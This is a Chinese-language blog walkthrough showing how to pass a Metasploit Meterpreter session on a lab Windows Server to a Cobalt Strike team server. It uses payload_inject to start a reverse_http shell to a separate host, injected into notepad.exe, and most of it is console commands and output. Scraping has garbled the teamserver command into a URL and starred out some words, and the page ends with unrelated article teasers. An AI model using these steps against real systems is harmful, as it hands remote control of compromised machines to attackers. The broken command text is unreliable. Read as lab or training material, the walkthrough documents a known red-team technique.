Metasploit如何派生一个shell给cobaltstrike

访客4年前黑客资讯1147

  Cobaltstrike作为一款协同APT工具,功能十分强大,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选,fireeye多次分析过实用cobaltstrike进行apt的案例。

  cobaltstrike3新版的已经摒弃了metasploit,重写了所有的功能,但是鉴于metasploit功能的强大,cobaltstrike仍然保留了对metasploit的接口,今天我们不聊其他的,

  只聊当我们使用metasploit获取到shell之后如何派生一个新的shell给cobaltstrike。系列参考我在安全脉搏上的:Cobalt strike browser pivot的应用实例

  实验环境:

  目标机器:windows server 2012 IP:192.168.81.150

  metasploit机器:mac osx IP:192.168.1.103

  cobaltstrike 机器:ubuntu 15.10 IP:192.168.81.135

  首先,我们通过其他的途径,使用metasploit在payload在目标机器上获取了一个meterpreter:

  cobaltstrike1

  进入我们获取到的meterpreter中

  cobaltstrike2

  由于在metasploit的一些局限性和操作的不便利性,我们需要把metasploit获取到的shell派生出来一个新的shell,转交给cobaltstrike,方便我们协同渗透

  在ubuntu机器上建立一个teamserver,然后本地链接,(仅仅为了演示,实际渗透中teamserver和client分开)

  user@ubuntu:/pentest/exploits/framework3/cobaltstrike$ sudo https://www.secpulse.com/archives/teamserver 192.168.81.135 *** *** ***

  [*] Generating X509 certificate and keystore (for SSL)

  [+] Team server is up on 50050

  [*] SHA1 hash of SSL cert is: d59e4862132ac9033c8f91216148bfd6d1049803

  启动客户端链接,这里我们需要建立一个新的监听器:

  cobaltstrike3

  ok,接下来,我们开始把macos上由metasploit获取的shell派生出一个新的shell转交给cobaltstrike,这里我们需要用到一个exploit: exploit/windows/local/payload_inject

  这个exploit是注入一个新的payload到当前的session里面,我们看下具体的操作

  exploit/windows/local/payload_injectmsfexploit(web_delivery) > use exploit/windows/local/payload_inject

  msfexploit(payload_inject) > show options

  

  Module options (exploit/windows/local/payload_inject):

  Name Current Setting Required Description

  ---- --------------- -------- -----------

  NEWPROCESS false no New notepad.exe to inject to

  PID no Process Identifier to inject of process to inject payload.

  SESSION yes The session to run this module on.

  Exploit target:

  

  Id Name

  -- ----

  0 Windows

  

  msfexploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http

  PAYLOAD=> windows/meterpreter/reverse_http

  msfexploit(payload_inject) > set DisablePayloadHandler true

  DisablePayloadHandler=> true

  msfexploit(payload_inject) > set LHOST 192.168.81.135

  LHOST=> 192.168.81.135

  msfexploit(payload_inject) > set LPORT 8880

  LPORT=> 8880

  msfexploit(payload_inject) > set SESSION 1

  SESSION=> 1

  msfexploit(payload_inject) > exploit

  

  [*]Launching notepad.exe...

  [*]Preparing 'windows/meterpreter/reverse_http' for PID 3916

  msfexploit(payload_inject) >

  

  这里我解释一下这些参数,

  由于cobaltstrike的监听器我们使用的是:windows/beacon_http/reverse_http,所以我们的payload也要使用:

  PAYLOAD windows/meterpreter/reverse_http

  设置本地监听ip和端口,由于我们的监听器是cobaltstrike的,所以要用到cobaltstrike机器的ip和端口

  默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,这里我们设置

  set DisablePayloadHandler true

  设置我们的当前session,执行,看看ubuntu机器上的cobaltstrike是否已经接受了我们由metasploit派生出来的shell。

  cobaltstrike4

  ok,ubuntu机器192.168.81.135上cobaltstrike已经有了一个新的shell,是由Mac主机192.168.1.103派生出来的新的,转交给cobaltstrike的。

  在渗透过程中,不要仅限于单一模式的思路,根据实际的情况,选择更优的 *** 来进行下一步的渗透测试。

  【原创作者:Sh@doM 授权投稿安全脉搏 安全脉搏 分享技术悦享品质】

相关文章

不同私域流量背后的运营体系设计

不同私域流量背后的运营体系设计

什么是私域流量?私域流量运营如何做?针对私域流量运营体系,产物设计需要支持的成果体系有哪些?本文从这些问题出发,对私域流量展开了梳理阐明,与各人分享。 一、昂贵的公域:越来越失望的ROI 公域流量是...

黑客代码需要网络吗(黑客必学的几个代码)

黑客代码需要网络吗(黑客必学的几个代码)

本文导读目录: 1、黑客一般都是怎么入侵电脑的(⊙_⊙)?电脑如果不联网会被入侵吗(⊙_⊙)? 2、网络黑客是怎么操作的 3、电脑会出出现那个黑客代码是什么原因 4、黑客是怎样通过网络入侵...

新一轮本科教育教学审个人先进材料范文核评估:为何评怎么评啥

  新一轮本科教育教学审核评估三问   继2014—2018年审核评估总体完成后,备受关注的新一轮审核评估又来了。教育部7日发布《普通高等学校本科教育教学审核评估实施方案(2021—2025年)》(...

什么是黄页(黄页最初诞生于哪个国家)

什么是黄页(黄页最初诞生于哪个国家)

就像黑白电视机、老旧的台式电脑、VCD播放机一样,厚厚的黄页也要走进博物馆了。 近日,英国黄页宣布:《黄页》(英国)将会在2019年1月印发最后一个实体版本,届时英国黄页“104最终版”将发行230...

入户申请书(给孩子上户口的个人申请)

入户申请书(给孩子上户口的个人申请) 入户申请 XXX派出所: 申请人:姓名,年龄,电话等基本情况。 申请事由:本人于XX年X月X日在XX地医院生育一男(女)孩,现取名为××,根据有关...

5岁男童遭狗扑咬整夜做噩梦-被狗咬不打狂犬疫苗

现在家里养宠物的人家是越来越多了,与此同时很多爱宠主人也已经形成了文明遛狗意识,但还是会有一些抱有侥幸心理的狗主人出现。近日南宁市盛天华府小区5岁男童就被狗狗给咬伤了,据悉5岁男童遭狗扑咬整夜做噩梦。...